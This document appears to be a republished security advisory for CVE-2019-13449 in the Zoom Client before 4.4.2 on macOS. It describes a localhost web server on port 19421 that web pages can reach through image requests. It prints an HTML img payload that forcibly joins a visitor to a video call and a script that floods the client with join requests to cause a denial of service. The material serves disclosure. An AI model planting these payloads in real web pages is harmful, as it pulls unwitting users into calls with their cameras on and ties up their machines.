Zoom Client before 4.4.2 Improper Input Validation Vulnerability

Summary

In the Zoom Client before 4.4.2 on macOS, remote attackers can cause a denial of service (continual focus grabs) via a sequence of invalid launch?action=join&confno= requests to localhost port 19421.

Credit:

The information has been provided by Jonathan Leitschuh

The original article can be found at:

https://bugs.chromium.org/p/chromium/issues/detail?id=951540

 


Details

Chrome allows CORS bypass on image requests made against localhost

This was originally discovered while researching a security vulnerability in a very popular piece of video conferencing software (similar to Skype for Business or Google Hangouts).

The infrastructure of this video conferencing software allows a user to send meeting invites as links to participants.
When participants click the link, it is opened in their browser and the browser is able to launch the user into a video call by opening the companies software on their local machine.
This process only requires the user to have installed the software on their computer, there’s no need for the user to have installed an external chrome plugin.

I was curious about how this process worked, so I began exploring the Javascript that executes in the browser that enables this to happen.

What I found was that the Javascript on the companies site makes an HTTP GET request for an image to the following URL:

http://localhost:19421/launch?action=join&confno=[some confrence number]

The reason that the Javascript loads an image instead of making a XMLHttpRequest is because Chrome blocks CORS request against localhost.
Related:
https://bugs.chromium.org/p/chromium/issues/detail?id=67743

In order to bypass this protection, the company instead used the loading of an image.

The screenshot attached shows the pseudo-case-switch statement they use to convey information from the localhost server to the Javscript running in the browser.
The dimensions of the image returned by the GET request are used by the Javascript to determine the success/failure of the webservers ability to join the user to the call.
For example, a 1×1 image response indicates a sucsess.

This vulnerability can be abused to forcibly join someone to a video call using the following HTML:

<img src=”http://localhost:19421/launch?action=join&confno=577781437″/>

Using this vulnerability, any website can effectively DOS a users machine with the following HTML:

<body>
<script>
var attackNumber = “614249281”

setInterval(function(){
console.log(“Fired”);
var image = document.createElement(“img”);
// Use a date to bust the browser’s cache
var date = new Date();
image.src = “http://localhost:19421/launch?action=join&confno= + attackNumber + “&” + date.getTime();
document.body.appendChild(image);
}, 1);

</script>
</body>

Using the vulnerability described above, a malicious attacker is able to forcibly join anyone with the vulnerable software installed (a majority of users) into a video call with their camera active by default. No user interaction required besides navigating to an impacted site.

It’s important to note, that the company with the impacted software has over 650,000 business customers and over 85% of the top 200 US universities. As of 2015, they had over 35 million active users.

Vulnerable Systems:

Zoom Client before 4.4.2 on macOS

CVE Information:

CVE-2019-13449

Disclosure Timeline:
Published Date:07/16/2019